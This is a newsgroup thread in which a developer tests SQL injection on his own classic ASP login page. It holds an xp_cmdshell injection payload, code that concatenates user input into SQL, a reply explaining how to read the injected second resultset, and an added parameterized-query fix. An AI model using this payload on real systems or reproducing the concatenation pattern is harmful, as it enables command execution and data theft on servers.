Hello all,
I'm having difficulties understanding why something is not going the way I
want it (sounds familiar?). I'm testing SQL injection on my own PC, based on
the article at http://aspalliance.com/articleViewe...aId=385&pId=-1.
When I enter only my credentials in the user field, like
administrator';use master exec xp_cmdshell 'dir c:\*.*'--
I get the resultant string
SELECT strusername, strpassword FROM tUser WHERE strusername = 'beheerder';
use master exec xp_cmdshell 'dir c:\*.*' --' AND strpassword = ''
Now the output of "Response.write objrso.Fields.count" is 2. A closer look
gives me 'administrator' and 'password'. Not the C:\ drive listing, which
does show up in SQL Query Analyzer! Is this by any means possible with the
code
Set objConn = Server.CreateObject("ADODB.Connection")
Set objrso = Server.CreateObject("ADODB.Recordset")
' cn holds the connection string (not shown in the post). The user-supplied
' username and password are concatenated straight into the statement text,
' which is what lets the quote and semicolon in the input start a second statement.
sql = "SELECT strusername, strpassword FROM tUser WHERE strusername = '" & _
      username & _
      "' AND strpassword = '" & password & _
      "'"
objConn.Open cn
objrso.Open sql, objConn
If not, how should I change this code? Any hints would be highly welcome.
Best regards,
Carl.

Hi Carl,
Since you have two different SQL statements, separated by a semicolon, the
provider executes them separately and returns two resultsets (recordsets).
When you open the objrso recordset, it points to the first one. To be able
to get information from the subsequent recordsets, you need to call the
NextRecordset method of the opened recordset:
Set objrso = objrso.NextRecordset
If the provider returns another resultset, you will see it after this call.
Val Mazur
Microsoft MVP
"Carl Matthews" <ecvaneersel@.nospam.hotmail.com> wrote in message
news:ecJmrkjIEHA.1140@.tk2msftngp13.phx.gbl...
> Hello all,
> I'm having difficulties understanding why something is not going the way I
> want it (sounds familiar?). I'm testing SQL injection on my own PC, based on
> the article at http://aspalliance.com/articleViewe...aId=385&pId=-1.
> When I enter only my credentials in the user field, like
> administrator';use master exec xp_cmdshell 'dir c:\*.*'--
> I get the resultant string
> SELECT strusername, strpassword FROM tUser WHERE strusername =
> 'beheerder';
> use master exec xp_cmdshell 'dir c:\*.*' --' AND strpassword = ''
>
> Now the output of "Response.write objrso.Fields.count" is 2. A closer look
> gives me 'administrator' and 'password'. Not the C:\ drive listing, which
> does show up in SQL Query Analyzer! Is this by any means possible with the
> code
> Set objConn = Server.CreateObject("ADODB.Connection")
> Set objrso = Server.CreateObject("ADODB.Recordset")
> ' cn holds the connection string (not shown in the post); username and
> ' password are concatenated straight into the statement text
> sql = "SELECT strusername, strpassword FROM tUser WHERE strusername = '" & _
>       username & _
>       "' AND strpassword = '" & password & _
>       "'"
> objConn.Open cn
> objrso.Open sql, objConn
> If not, how should I change this code? Any hints would be highly welcome.
> Best regards,
> Carl.
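The fix a practitioner would actually want here is not to read the second recordset but to make sure there never is one. The following classic ASP snippet is an added example, not code from either post or from the aspalliance article: it performs the same tUser lookup through an ADODB.Command with bound parameters instead of string concatenation. It assumes the thread's table tUser(strusername, strpassword), a connection string in the variable cn (never shown in the thread), and a column width of 50 characters for both fields.

```vbscript
' Added example (not from the original posts): the same login lookup written
' with ADODB.Command parameters instead of concatenating username/password
' into the SQL text.
' Assumptions: table tUser(strusername, strpassword) as in the thread, a
' connection string in cn (not shown in the thread), and 50-char columns.
Option Explicit

Dim cn, username, password
Dim objConn, objCmd, objrso

username = Request.Form("username")
password = Request.Form("password")

Set objConn = Server.CreateObject("ADODB.Connection")
objConn.Open cn

Set objCmd = Server.CreateObject("ADODB.Command")
Set objCmd.ActiveConnection = objConn
objCmd.CommandType = 1      ' adCmdText: plain SQL text with ? placeholders
objCmd.CommandText = "SELECT strusername, strpassword FROM tUser " & _
                     "WHERE strusername = ? AND strpassword = ?"

' adVarChar = 200, adParamInput = 1. Each value is sent to SQL Server as a
' parameter, so quotes and semicolons in the input stay inside the value and
' never become part of the statement.
objCmd.Parameters.Append objCmd.CreateParameter("username", 200, 1, 50, username)
objCmd.Parameters.Append objCmd.CreateParameter("password", 200, 1, 50, password)

Set objrso = objCmd.Execute

' An input such as  administrator';use master exec xp_cmdshell 'dir c:\*.*'--
' is now compared literally as a user name. Only one statement runs, so
' there is exactly one resultset and nothing for NextRecordset to reach.
If objrso.EOF Then
    Response.Write "Login failed"
Else
    Response.Write "Welcome " & Server.HTMLEncode(objrso("strusername"))
End If

objrso.Close
objConn.Close
```

Positional ? placeholders work with the SQL Server OLE DB provider when CommandType is adCmdText; the parameter order must match the order of the placeholders. Comparing strpassword directly, as both versions do, also means passwords are stored in clear text in tUser, which is a separate weakness from the injection and worth addressing at the same time.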